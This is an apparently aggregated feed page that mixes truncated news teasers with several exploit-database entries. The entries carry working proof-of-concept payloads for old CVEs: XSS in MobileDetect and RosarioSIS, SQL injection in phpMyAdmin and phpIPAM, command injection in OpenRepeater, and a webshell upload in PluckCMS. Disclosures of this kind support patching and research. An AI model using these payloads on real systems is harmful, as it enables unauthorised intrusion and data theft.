Napapijri appoints former Yoox managing director to president role
“This new chapter is an important milestone in my career. It offers me the opportunity…
Recent Changes in Children’s Vaccination Rates by Race and Ethnicity
Summary As routine and seasonal vaccination rates continue to decline among children, racial disparities in vaccination rates persist. Declining vaccination rates leave children at increased risk for preventable illnesses, while disparities leave some children at greater risk relative to others. Research shows that many childhood diseases require a high level of vaccination within the population…
Want a Fortell Hearing Aid? Well, Who Do You Know?
“I’ve tried different brands of hearing aids, and they’re good, but they’re not this good,” says Martin in a Zoom interview. He visited the team in Soho, did the street test, and was delighted when he tried it with his wife and daughter at their favorite restaurant, with de Jonge sitting with the laptop several…
MobileDetect 2.8.31 – Cross-Site Scripting (XSS)
# Exploit Title: MobileDetect 2.8.31 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/serbanghita/Mobile-Detect/ # Software Link: https://github.com/serbanghita/Mobile-Detect/ # Version: 4da80e5 # Tested on: Windows # CVE : CVE-2018-25080 Proof Of Concept: GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E Steps to Reproduce 1. Login as an admin user. 2. Send the request. …
We’re announcing new health AI funding, while a new report signals a turning point for health in Europe.
At the European Health Summit in Brussels, Greg Corrado, Distinguished Scientist at Google, released a new report authored by Implement Consulting Group and commissioned by Google revealing that AI is reversing the long-term trend of slowing scientific productivity, providing a turning point for a European healthcare system grappling with rising costs and workforce shortages. The…
phpIPAM 1.4 – SQL-Injection – PHP webapps Exploit
# Exploit Title: phpIPAM 1.4 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.4 # Tested on: Windows # CVE : CVE-2019-16693 Proof Of Concept # Ensure you have a valid user session before executing the PoC. POST /app/admin/custom-fields/order.php…
OpenRepeater 2.1 – OS Command Injection
# Exploit Title: OpenRepeater 2.1 – OS Command Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OpenRepeater/openrepeater # Software Link: https://github.com/OpenRepeater/openrepeater # Version: 2.1 # Tested on: Ubuntu # CVE : CVE-2019-25024 Proof Of Concept # PoC for OS Command Injection in OpenRepeater before version 2.2 #…
phpMyAdmin 5.0.0 – SQL Injection
# Exploit Title: phpMyAdmin 5.0.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/ # Software Link: https://github.com/phpmyadmin/phpmyadmin/ # Version: 5.0.0 # Tested on: Windows # CVE : CVE-2020-5504 Proof Of Concept GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20–%20 HTTP/1.1 Host: phpmyadmin Connection: close # Additional conditions: # – The attacker…
RosarioSIS 6.7.2 – Cross Site Scripting (XSS)
# Exploit Title: RosarioSIS 6.7.2 – Cross Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15716 Proof Of Concept http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22 **Conditions**: 1. User must be authenticated (as shown by the session…
Warning over cosmetic face fillers as scans reveal new details of risks
Michelle RobertsDigital health editor Getty Images People who have cosmetic filler injections in their face should be warned of the risk of a dangerous complication involving blocked arteries that can lead to skin loss and even blindness due to damaged blood flow, say experts. Researchers used ultrasound to study 100 cases of filler injections that…
PluckCMS 4.7.10 – Unrestricted File Upload
# Exploit Title: PluckCMS 4.7.10 – Unrestricted File Upload # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/pluck-cms/pluck/ # Software Link: https://github.com/pluck-cms/pluck/ # Version: 4.7.10 # Tested on: Windows # CVE : CVE-2020-20969 Proof Of Concept GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1 Host: pluck Cookie: PHPSESSID=[valid_session_id] **Access Method:** http://pluck/files/exploit_copy.php?cmd=id **Additional…
